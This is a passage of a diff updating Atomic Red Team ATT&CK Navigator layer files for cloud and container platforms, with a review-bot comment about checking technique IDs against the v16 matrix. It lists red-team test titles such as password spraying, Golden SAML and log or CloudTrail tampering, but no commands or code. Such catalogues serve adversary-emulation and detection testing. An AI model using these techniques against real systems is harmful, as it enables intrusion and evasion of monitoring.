AD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"}]},{"techniqueID":"T1531","score":2,"enabled":true,"comment":"\n- Azure AD - Delete user via Azure AD PowerShell\n- Azure AD - Delete user via Azure CLI\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1552","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.005","score":1,"enabled":true,"comment":"\n- Azure - Search Azure AD User Attributes for Passwords\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1564","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}]},{"techniqueID":"T1564.008","score":1,"enabled":true,"comment":"\n- New-Inbox Rule to Hide E-mail in M365\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.008/T1564.008.md"}]},{"techniqueID":"T1606","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606/T1606.md"}]},{"techniqueID":"T1606.002","score":1,"enabled":true,"comment":"\n- Golden SAML\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]}]}
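Review bot: only the `versions` object changes in this hunk (`attack` 13 to 16, `navigator` 4.8.2 to 5.1.0, `layer` 4.4 to 4.5); the `techniques` array is byte-identical on both sides, so this is a metadata-only bump. Please confirm the technique IDs and comments were regenerated, or at least validated, against the v16 matrix rather than the version string edited in place: a layer that declares v16 but carries an older technique set still loads in Navigator 5.x, and any ID deprecated or re-numbered between v13 and v16 would simply fail to appear on the matrix with no error. A quick check is to diff the `techniqueID` values in this file against the v16 STIX bundle before merging.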
@@ -1 +1 @@
{"name":"Atomic Red Team (Containers)","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team (Containers) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1046","score":1,"enabled":true,"comment":"\n- Network Service Discovery for Containers\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1053","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.007","score":2,"enabled":true,"comment":"\n- ListCronjobs\n- CreateCronjob\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1069","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":1,"enabled":true,"comment":"\n- Permission Groups Discovery for Containers- Local Groups\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1552","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.007","score":2,"enabled":true,"comment":"\n- List All Secrets\n- ListSecrets\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1609","score":2,"enabled":true,"comment":"\n- ExecIntoContainer\n- Docker Exec Into 
Container\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1610","score":1,"enabled":true,"comment":"\n- Deploy Docker container\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"}]},{"techniqueID":"T1611","score":3,"enabled":true,"comment":"\n- Deploy container using nsenter container escape\n- Mount host filesystem to escape privileged Docker container\n- Privilege Escalation via Docker Volume Mapping\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]},{"techniqueID":"T1612","score":1,"enabled":true,"comment":"\n- Build Image On Host\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1612/T1612.md"}]},{"techniqueID":"T1613","score":2,"enabled":true,"comment":"\n- Docker Container and Resource Discovery\n- Podman Container and Resource Discovery\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1613/T1613.md"}]}]}
{"name":"Atomic Red Team (Containers)","versions":{"attack":"16","navigator":"5.1.0","layer":"4.5"},"description":"Atomic Red Team (Containers) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1046","score":1,"enabled":true,"comment":"\n- Network Service Discovery for Containers\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1053","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.007","score":2,"enabled":true,"comment":"\n- ListCronjobs\n- CreateCronjob\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1069","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":1,"enabled":true,"comment":"\n- Permission Groups Discovery for Containers- Local Groups\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1552","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.007","score":2,"enabled":true,"comment":"\n- List All Secrets\n- ListSecrets\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1609","score":2,"enabled":true,"comment":"\n- ExecIntoContainer\n- Docker Exec Into 
Container\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1610","score":1,"enabled":true,"comment":"\n- Deploy Docker container\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"}]},{"techniqueID":"T1611","score":3,"enabled":true,"comment":"\n- Deploy container using nsenter container escape\n- Mount host filesystem to escape privileged Docker container\n- Privilege Escalation via Docker Volume Mapping\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]},{"techniqueID":"T1612","score":1,"enabled":true,"comment":"\n- Build Image On Host\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1612/T1612.md"}]},{"techniqueID":"T1613","score":2,"enabled":true,"comment":"\n- Docker Container and Resource Discovery\n- Podman Container and Resource Discovery\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1613/T1613.md"}]}]}
@@ -1 +1 @@
{"name":"Atomic Red Team (Google-Workspace)","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team (Google-Workspace) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1078","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.004","score":1,"enabled":true,"comment":"\n- Creating GCP Service Account and Service Account Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]}]}
{"name":"Atomic Red Team (Google-Workspace)","versions":{"attack":"16","navigator":"5.1.0","layer":"4.5"},"description":"Atomic Red Team (Google-Workspace) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1078","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.004","score":1,"enabled":true,"comment":"\n- Creating GCP Service Account and Service Account Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]}]}
@@ -1 +1 @@
{"name":"Atomic Red Team (Iaas:AWS)","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team (Iaas:AWS) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1098","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}],"comment":"\n- AWS - Create a group and add a user to that group\n"},{"techniqueID":"T1098.001","score":1,"enabled":true,"comment":"\n- AWS - Create Access Key and Secret Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1110","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.003","score":1,"enabled":true,"comment":"\n- AWS - Password Spray an AWS using GoAWSConsoleSpray\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1136","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.003","score":1,"enabled":true,"comment":"\n- AWS - Create a new IAM user\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1201","score":1,"enabled":true,"comment":"\n- Examine AWS Password Policy\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1530","score":1,"enabled":true,"comment":"\n- AWS - Scan for Anonymous Access to S3\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1530/T1530.md"}]},{"techniqueID":"T1552","score":1,"enabled":true,"comment":"\n- AWS - Retrieve EC2 Password Data using stratus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1562","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.001","score":1,"enabled":true,"comment":"\n- AWS - GuardDuty Suspension or Deletion\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.008","score":6,"enabled":true,"comment":"\n- AWS - CloudTrail Changes\n- AWS - Disable CloudTrail Logging Through Event Selectors using Stratus\n- AWS - CloudTrail Logs Impairment Through S3 Lifecycle Rule using Stratus\n- AWS - Remove VPC Flow Logs using Stratus\n- AWS - CloudWatch Log Group Deletes\n- AWS CloudWatch Log Stream Deletes\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1580","score":2,"enabled":true,"comment":"\n- AWS - EC2 Enumeration from Cloud Instance\n- AWS - EC2 Security Group Enumeration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1580/T1580.md"}]},{"techniqueID":"T1619","score":1,"enabled":true,"comment":"\n- AWS S3 Enumeration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1619/T1619.md"}]}]}
{"name":"Atomic Red Team (Iaas:AWS)","versions":{"attack":"16","navigator":"5.1.0","layer":"4.5"},"description":"Atomic Red Team (Iaas:AWS) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1098","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}],"comment":"\n- AWS - Create a group and add a user to that group\n"},{"techniqueID":"T1098.001","score":1,"enabled":true,"comment":"\n- AWS - Create Access Key and Secret Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1110","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.003","score":1,"enabled":true,"comment":"\n- AWS - Password Spray an AWS using GoAWSConsoleSpray\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1136","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.003","score":1,"enabled":true,"comment":"\n- AWS - Create a new IAM user\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1201","score":1,"enabled":true,"comment":"\n- Examine AWS Password Policy\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1526","score":1,"enabled":true,"comment":"\n- AWS - Enumerate common cloud services\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1526/T1526.md"}]},{"techniqueID":"T1530","score":1,"enabled":true,"comment":"\n- AWS - Scan for Anonymous Access to S3\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1530/T1530.md"}]},{"techniqueID":"T1552","score":1,"enabled":true,"comment":"\n- AWS - Retrieve EC2 Password Data using stratus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1562","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.001","score":1,"enabled":true,"comment":"\n- AWS - GuardDuty Suspension or Deletion\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.008","score":6,"enabled":true,"comment":"\n- AWS - CloudTrail Changes\n- AWS - Disable CloudTrail Logging Through Event Selectors using Stratus\n- AWS - CloudTrail Logs Impairment Through S3 Lifecycle Rule using Stratus\n- AWS - Remove VPC Flow Logs using Stratus\n- AWS - CloudWatch Log Group Deletes\n- AWS CloudWatch Log Stream Deletes\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1580","score":2,"enabled":true,"comment":"\n- AWS - EC2 Enumeration from Cloud Instance\n- AWS - EC2 Security Group Enumeration\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1580/T1580.md"}]},{"techniqueID":"T1619","score":1,"enabled":true,"comment":"\n- AWS S3 Enumeration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1619/T1619.md"}]},{"techniqueID":"T1648","score":1,"enabled":true,"comment":"\n- Lambda Function Hijack\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1648/T1648.md"}]},{"techniqueID":"T1651","score":1,"enabled":true,"comment":"\n- AWS Run Command (and Control)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1651/T1651.md"}]}]}
@@ -1 +1 @@
{"name":"Atomic Red Team (Iaas:Azure)","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team (Iaas:Azure) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1078","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.004","score":1,"enabled":true,"comment":"\n- Azure Persistence Automation Runbook Created or Modified\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1098","score":2,"enabled":true,"comment":"\n- Azure - adding user to Azure role in subscription\n- Azure - adding service principal to Azure role in subscription\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1526","score":1,"enabled":true,"comment":"\n- Azure - Dump Subscription Data with MicroBurst\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1526/T1526.md"}]},{"techniqueID":"T1528","score":1,"enabled":true,"comment":"\n- Azure - Dump All Azure Key Vaults with Microburst\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1528/T1528.md"}]},{"techniqueID":"T1530","score":2,"enabled":true,"comment":"\n- Azure - Enumerate Azure Blobs with MicroBurst\n- Azure - Scan for Anonymous Access to Azure Storage (Powershell)\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1530/T1530.md"}]},{"techniqueID":"T1552","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.005","score":1,"enabled":true,"comment":"\n- Azure - Dump Azure Instance Metadata from Virtual Machines\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1562","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.008","score":1,"enabled":true,"comment":"\n- Azure - Eventhub Deletion\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]}]}
{"name":"Atomic Red Team (Iaas:Azure)","versions":{"attack":"16","navigator":"5.1.0","layer":"4.5"},"description":"Atomic Red Team (Iaas:Azure) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1078","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.004","score":1,"enabled":true,"comment":"\n- Azure Persistence Automation Runbook Created or Modified\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1098","score":2,"enabled":true,"comment":"\n- Azure - adding user to Azure role in subscription\n- Azure - adding service principal to Azure role in subscription\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1526","score":2,"enabled":true,"comment":"\n- Azure - Dump Subscription Data with MicroBurst\n- Azure - Enumerate common cloud services\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1526/T1526.md"}]},{"techniqueID":"T1528","score":1,"enabled":true,"comment":"\n- Azure - Dump All Azure Key Vaults with Microburst\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1528/T1528.md"}]},{"techniqueID":"T1530","score":2,"enabled":true,"comment":"\n- Azure - Enumerate Azure Blobs with MicroBurst\n- Azure - Scan for Anonymous Access to Azure Storage (Powershell)\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1530/T1530.md"}]},{"techniqueID":"T1552","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.005","score":1,"enabled":true,"comment":"\n- Azure - Dump Azure Instance Metadata from Virtual Machines\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1562","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.008","score":1,"enabled":true,"comment":"\n- Azure - Eventhub Deletion\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]}]}
@@ -1 +1 @@
{"name":"Atomic Red Team (Iaas:GCP)","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team (Iaas:GCP) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1078","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.004","score":2,"enabled":true,"comment":"\n- Creating GCP Service Account and Service Account Key\n- GCP - Create Custom IAM Role\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1098","score":1,"enabled":true,"comment":"\n- GCP - Delete Service Account Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1485","score":1,"enabled":true,"comment":"\n- GCP - Delete Bucket\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1562","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.008","score":1,"enabled":true,"comment":"\n- GCP - Delete Activity Event Log\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]}]}
{"name":"Atomic Red Team (Iaas:GCP)","versions":{"attack":"16","navigator":"5.1.0","layer":"4.5"},"description":"Atomic Red Team (Iaas:GCP) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1078","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.004","score":2,"enabled":true,"comment":"\n- Creating GCP Service Account and Service Account Key\n- GCP - Create Custom IAM Role\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1098","score":1,"enabled":true,"comment":"\n- GCP - Delete Service Account Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1485","score":1,"enabled":true,"comment":"\n- GCP - Delete Bucket\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1562","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.008","score":1,"enabled":true,"comment":"\n- GCP - Delete Activity Event Log\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]}]}
@@ -1 +1 @@
{"name":"Atomic Red Team (Office-365)","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team (Office-365) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1098","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1098.002","score":1,"enabled":true,"comment":"\n- EXO - Full access mailbox permission granted to a user\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.002/T1098.002.md"}]},{"techniqueID":"T1114","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114/T1114.md"}]},{"techniqueID":"T1114.002","score":1,"enabled":true,"comment":"\n- Office365 - Remote Mail Collected\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.002/T1114.002.md"}]},{"techniqueID":"T1114.003","score":1,"enabled":true,"comment":"\n- Office365 - Email Forwarding\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.003/T1114.003.md"}]},{"techniqueID":"T1562","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.001","score":1,"enabled":true,"comment":"\n- office-365-Disable-AntiPhishRule\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.008","score":2,"enabled":true,"comment":"\n- Office 365 - Exchange Audit Log 
Disabled\n- Office 365 - Set Audit Bypass For a Mailbox\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]}]}
